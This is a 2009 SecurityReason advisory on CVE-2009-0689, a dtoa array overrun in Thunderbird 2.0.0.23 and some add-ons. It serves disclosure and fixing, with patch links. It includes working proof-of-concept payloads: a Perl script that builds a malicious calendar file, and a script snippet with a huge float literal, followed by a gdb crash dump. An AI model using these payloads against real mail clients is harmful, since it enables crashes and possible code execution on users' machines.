Thunderbird 2.0.0.23 Remote Array Overrun

`[ Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code  
execution) ]  
  
Author: Maksymilian Arciemowicz and sp3x  
http://SecurityReason.com  
Date:  
- Dis.: 07.05.2009  
- Pub.: 11.12.2009  
  
CVE: CVE-2009-0689  
CWE: CWE-119  
Risk: High  
Remote: Yes  
  
Affected Software:  
- Thunderbird 2.0.0.23  
  
Fixed in:  
- Thunderbird 3.0  
- Thunderbird 2.0.0.24pre  
  
NOTE: Prior versions may also be affected.  
  
Original URL:  
http://securityreason.com/achievement_securityalert/78  
  
  
--- 0.Description ---  
Thunderbird 2 includes many new features to help you manage your inbox.  
With Thunderbird 2, it?s easier to prioritize and find your important  
email with tags and the new find bar helps you find content within your  
email faster.  
Lightning brings the Sunbird calendar to the popular email client,  
Mozilla Thunderbird. Since it's an extension, Lightning is tightly  
integrated with Thunderbird, allowing it to easily perform email-related  
calendaring tasks.  
  
  
--- 1. Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code  
execution) ---  
The main problem exist in dtoa implementation. Thunderbird has the same  
dtoa as Firefox, etc. This problem affects many additional Add-ons for  
thunderbird.  
  
Example for affected Add-ons:  
- Lightning 0.9  
- Thunderbrowse 3.2.6.7  
- more  
  
and it is the same like SREASONRES:20090625.  
  
http://securityreason.com/achievement_securityalert/63  
  
but fix for SREASONRES:20090625, used by openbsd was not good.  
More information about fix for openbsd and similars SREASONRES:20091030,  
  
http://securityreason.com/achievement_securityalert/69  
  
We can create any number of float, which will overwrite the memory. In  
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and  
it is possible to call 16<= elements of freelist array.  
  
  
--- 2. Proof of Concept (PoC) ---  
  
(PoC for Lightning )  
-----------------------  
#!/usr/bin/perl  
# SecurityReason.com  
# sp3x  
# tested on WinXp SP3  
  
my $header = "BEGIN:VCALENDAR\n".  
"PRODID:-//Mozilla.org/NONSGML Mozilla Calendar V1.1//EN\n".  
"VERSION:2.0\n".  
"BEGIN:VTIMEZONE\n".  
"TZID:Europe/Prague\n".  
"X-LIC-LOCATION:Europe/Prague\n".  
"BEGIN:DAYLIGHT\n".  
"TZOFFSETFROM:+0100\n".  
"TZOFFSETTO:+0200\n".  
"TZNAME:CEST\n".  
"DTSTART:19700329T020000\n".  
"RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=3\n".  
"END:DAYLIGHT\n".  
"BEGIN:STANDARD\n".  
"TZOFFSETFROM:+0200\n".  
"TZOFFSETTO:+0100\n".  
"TZNAME:CET\n".  
"DTSTART:19701025T030000\n".  
"RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=10\n".  
"END:STANDARD\n".  
"END:VTIMEZONE\n".  
"BEGIN:VEVENT\n".  
"CREATED:20091117T095214Z\n".  
"LAST-MODIFIED:20091117T095217Z\n".  
"DTSTAMP:20091117T095214Z\n".  
"UID:5d0cfefe-22f6-476e-93bf-bd13df140b18\n";  
my $s = "SUMMARY:0.";  
my $expl = "1" x 296450;  
my $footer = "\nDTSTART;TZID=Europe/Prague:20100111T110000\n".  
"DTEND;TZID=Europe/Prague:20100111T120000\n".  
"END:VEVENT\n".  
"END:VCALENDAR\n";  
  
open(myfile,'>>test.ics');  
print myfile $header.$s.$expl.$footer;  
-----------------------  
  
(PoC for Thunderbrowse )  
-----------------------  
<script>  
var a=0.<?php echo str_repeat("1",333333); ?>;  
</script>  
-----------------------  
  
When we use Thunderbrowse to see this site, Thunderbird will crash with:  
  
Program terminated with signal 11, Segmentation fault.  
#0 0xbb15d1e7 in ?? ()  
  
eax 0x0 0  
ecx 0xa 10  
edx 0x0 0  
ebx 0xbb16eb38 -1156125896  
esp 0xbfbfce58 0xbfbfce58  
ebp 0xbfbfce74 0xbfbfce74  
esi 0xb 11  
edi 0xb768e700 -1217861888  
eip 0xbb15d1e7 0xbb15d1e7  
eflags 0x282 [ SF IF ]  
cs 0x23 35  
ss 0x2b 43  
ds 0x2b 43  
es 0x2b 43  
fs 0xab 171  
gs 0xb3 179  
  
(gdb) x/x ($eip)  
0xbb15d1e7: Cannot access memory at address 0xbb15d1e7  
(gdb) x/x ($esi)  
0xb: Cannot access memory at address 0xb  
(gdb) x/x ($edi)  
0xb768e700: 0x1c71c71c  
  
now esi=0xb and edi=0x1c71c71c  
  
(gdb) x/20x ($edi)  
0xb768e700: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c  
0xb768e710: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7  
0xb768e720: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71  
0xb768e730: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c  
0xb768e740: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7  
  
(gdb) x/50x ($edi)+37000  
0xb7697788: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7  
0xb7697798: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71  
0xb76977a8: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c  
0xb76977b8: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7  
0xb76977c8: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71  
0xb76977d8: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c  
0xb76977e8: 0xc71c71c7 0x91c71c71 0x0b76d741 0x1af63420  
0xb76977f8: 0x7c6568c4 0xd74952a1 0x552d1c87 0x4018081a  
0xb7697808: 0xcb313ca6 0xd16c5484 0x36d13467 0x130c4b7d  
0xb7697818: 0x92c1d06c 0xf70d9591 0x56bea87c 0x7c7bcc44  
0xb7697828: 0xe6dd415d 0x210c53a8 0x482d162b 0x6d39c1c9  
0xb7697838: 0x478f5fb2 0x9d6a2f46 0xe8b20d52 0xb012aa49  
0xb7697848: 0xd75822f6 0x83ebbe5a  
  
  
--- 3. SecurityReason Note ---  
Officialy SREASONRES:20090625 has been detected in:  
- OpenBSD  
- NetBSD  
- FreeBSD  
- MacOSX  
- Google Chrome  
- Mozilla Firefox  
- Mozilla Seamonkey  
- Mozilla Thunderbird  
- Mozilla Sunbird  
- Mozilla Camino  
- KDE (example: konqueror)  
- Opera  
- K-Meleon  
- F-Lock  
  
This list is not yet closed.  
  
  
--- 4. Fix ---  
NetBSD fix (optimal):  
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h  
  
OpenBSD fix:  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c  
  
  
--- 5. Credits ---  
Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.  
  
  
--- 6. Greets ---  
Infospec p_e_a pi3  
  
  
--- 7. Contact ---  
Email:  
- cxib {a.t] securityreason [d0t} com  
- sp3x {a.t] securityreason [d0t} com  
  
GPG:  
- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg  
- http://securityreason.com/key/sp3x.gpg  
  
http://securityreason.com/  
http://securityreason.pl/  
  
  
`